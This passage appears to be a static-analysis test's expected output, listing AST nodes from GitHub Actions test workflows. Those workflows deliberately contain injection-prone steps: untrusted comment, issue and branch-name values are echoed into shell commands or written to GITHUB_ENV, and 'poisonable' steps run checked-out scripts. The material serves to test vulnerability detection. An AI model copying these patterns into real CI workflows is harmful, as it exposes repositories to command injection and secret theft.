-| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo 
REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | -| 
.github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | 
-| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | 
Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 
| sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| 
.github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | 
.github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo 
'${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ 
github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo 
'${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | -| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | -| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| 
.github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > 
issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| 
.github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a 
